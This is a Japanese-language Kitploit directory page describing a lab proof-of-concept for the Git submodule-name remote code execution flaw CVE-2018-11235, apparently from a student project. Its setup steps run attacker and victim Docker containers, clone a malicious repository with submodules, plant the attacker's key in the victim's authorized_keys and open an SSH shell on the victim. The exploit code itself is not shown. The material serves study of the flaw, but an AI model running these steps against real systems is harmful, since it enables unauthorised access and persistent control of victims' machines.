Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2018-11235 — 概念実証 - RCEエクスプロイト : Gitサブモジュール名の脆弱性 - Ensimag 2018年11月 | Kitploit
ツール/GitHubGitHub/ygouzerh/cve-2018-11235
脆弱性分析エクスプロイトペネトレーションテスト学習と教育リモートアクセスツールラボと実践
GitHubygouzerh/cve-2018-11235

CVE-2018-11235

概念実証 - RCEエクスプロイト : Gitサブモジュール名の脆弱性 - Ensimag 2018年11月

リポジトリを見る
117年前未レビュー
ウェブサイト

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2018-11235

はじめに

Docker コンテナをビルドするには、次を使用します:

root@kitploit:~
make docker

(以下の make コマンドは、お使いのマシンの異なるターミナルで並行して実行してください)

攻撃者サーバーのコンテナを起動するには、次を使用します:

root@kitploit:~
make run_server

被害者を表すコンテナを起動するには、次を使用します:

root@kitploit:~
make run_client

コンテナは client.py スクリプトを起動します。このスクリプトは、自身の IP アドレスとユーザー名を攻撃者に送信します。

クライアントのコンソールの指示に従って、悪意のある git リポジトリをクローンしてください。

root@kitploit:~
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned

被害者の IP アドレスとユーザー名がサーバーに送信されることが確認できます。

クローン後、攻撃者の公開鍵がクライアントの authorized_keys に正しく追加されていることを確認してください。

次に、サーバーからクライアントへのシェルを開くには、お使いのマシンで次のコマンドを実行します:

root@kitploit:~
make server_bash

ssh <transmitted_username>@<transmitted_host>

質問

この Proof of Concept の実行に関して何か問題が発生した場合は、このリポジトリに issue を作成してください:https://github.com/ygouzerh/CVE-2018-11235/issues 。できるだけ早く回答いたします。

ツールをダウンロード